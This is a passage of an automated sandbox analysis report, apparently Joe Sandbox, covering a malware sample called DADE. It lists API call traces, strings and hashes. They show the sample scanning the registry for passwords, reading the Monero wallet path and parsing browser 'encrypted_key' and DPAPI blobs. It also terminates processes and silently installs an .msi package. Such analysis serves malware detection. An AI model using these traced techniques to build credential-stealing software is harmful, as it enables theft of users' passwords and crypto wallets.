                                                        • Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                        • Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                        • Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
                                                        • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                        • Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
                                                        • Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                        • Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
                                                        • Part of subcall function 00407710: strlen.MSVCRT ref: 00407840
                                                      • lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 004079FD
                                                      • lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407A30
                                                      • wsprintfA.USER32 ref: 00407A50
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00407A79
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
                                                      • lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID: :
                                                      • API String ID: 2460923012-3653984579
                                                      • Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                      • Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
                                                      • Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                      • Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5
                                                      APIs
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009ECA1C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009ECA45
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 009ECB38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$ExecuteShelllstrcatlstrlen
                                                      • String ID: /i "$ /passive$(QC$.msi$<
                                                      • API String ID: 619169029-3696510191
                                                      • Opcode ID: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
                                                      • Instruction ID: d5dca2793c180d509505e509627524028da1d654905497cdb692dc5ab902e2c2
                                                      • Opcode Fuzzy Hash: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
                                                      • Instruction Fuzzy Hash: 3B418071D102998FCB10EFA8C882AADBBB5AF88305F14887AE545E7311DB74DD46CB40
                                                      APIs
                                                      • __getptd.LIBCMT ref: 009F9510
                                                        • Part of subcall function 009F8A96: __getptd_noexit.LIBCMT ref: 009F8A99
                                                        • Part of subcall function 009F8A96: __amsg_exit.LIBCMT ref: 009F8AA6
                                                      • __amsg_exit.LIBCMT ref: 009F9530
                                                      • __lock.LIBCMT ref: 009F9540
                                                      • InterlockedDecrement.KERNEL32(?), ref: 009F955D
                                                      • free.MSVCRT ref: 009F9570
                                                      • InterlockedIncrement.KERNEL32(XuC), ref: 009F9588
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                      • String ID: XuC$XuC
                                                      • API String ID: 634100517-965221565
                                                      • Opcode ID: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
                                                      • Instruction ID: f48fff4ba4a23ad6a7fcbe16f009385764187fd3e422715cee27e0d3fb2f2aa8
                                                      • Opcode Fuzzy Hash: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
                                                      • Instruction Fuzzy Hash: 6301A171D0AB2DABDB33ABA9940577DB7A0AF44710F050115FE1063280CB34AA41DFD6
                                                      APIs
                                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
                                                      • memset.MSVCRT ref: 00409ECF
                                                      • LocalAlloc.KERNEL32(00000040), ref: 00409F07
                                                        • Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E
                                                      • lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpymemcmp$AllocLocalmemset
                                                      • String ID: @$v10$v20
                                                      • API String ID: 3420379846-278772428
                                                      • Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                      • Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
                                                      • Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                      • Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8
                                                      APIs
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EC736
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EC75F
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 009EC7CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                      • String ID: "" $(QC$(QC$<
                                                      • API String ID: 3031569214-2404812987
                                                      • Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                      • Instruction ID: 31394d731eb2722f2a044748e4f2206706e6ed4c05526bd8ba3ba89dfc1158d0
                                                      • Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                      • Instruction Fuzzy Hash: C4514F71D042998FCB10EFB9D881AACBBB1AF88314F25487AE545EB712DB749D46CF40
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 009F2982
                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,009E967D,00000000,00000000,00000000,00000000), ref: 009F29B3
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F2A16
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F2A1D
                                                      • wsprintfA.USER32 ref: 009F2A42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: :\$C
                                                      • API String ID: 2572753744-3309953409
                                                      • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                      • Instruction ID: f23003a35257220081c7d1150b03730d7d0037c293448a06bb96ea69fa655a75
                                                      • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                      • Instruction Fuzzy Hash: 093181B1D082499FCB14CFA88A85AEEFFBDEB58740F00416DE505E7650E2748B008BB1
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                      • RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                      Strings
                                                      • SOFTWARE\monero-project\monero-core, xrefs: 0040102F
                                                      • wallet_path, xrefs: 0040104D
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                      • API String ID: 3466090806-4244082812
                                                      • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                      • Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
                                                      • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                      • Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00424789
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
                                                      • CloseHandle.KERNEL32(00000000), ref: 004247D2
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
                                                      • CloseHandle.KERNEL32(00000000), ref: 004247EB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009F49E0
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 009F49F0
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F4A02
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009F4A23
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 009F4A32
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F4A39
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F4A47
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F4A52
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 2af0d5cc91a786b46c1f9a01411f84cfb58680b6325d2b661db5999e6092fa54
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: 22019271A81218AFE7215B609C89FFB777DEB48751F001188FA0992191EFB0CD808FA4
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 0040717E
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004071C0
                                                      • memcpy.MSVCRT(00000000,?), ref: 004071ED
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
                                                      • HeapFree.KERNEL32(00000000), ref: 0040720A
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00407269
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 1745114167-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 009D73E5
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 009D7420
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009D7427
                                                      • memcpy.MSVCRT(00000000,?), ref: 009D7454
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 009D746A
                                                      • HeapFree.KERNEL32(00000000), ref: 009D7471
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 009D74D0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 413393563-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: a8ef38b6b6d677e7ba5fd24704c3ad127a5d270b0ca2775cb6816545d6e0fdfe
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: 2F416E717446059BDB20CFA9EC847AAF7E9EB85305F14856AEC4DC7350E775EC108BA0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00409D08
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
                                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocLocallstrcpymemcmp
                                                      • String ID: $"encrypted_key":"$DPAPI
                                                      • API String ID: 4154055062-738592651
                                                      • Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                      • Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
                                                      • Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                      • Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00417F84
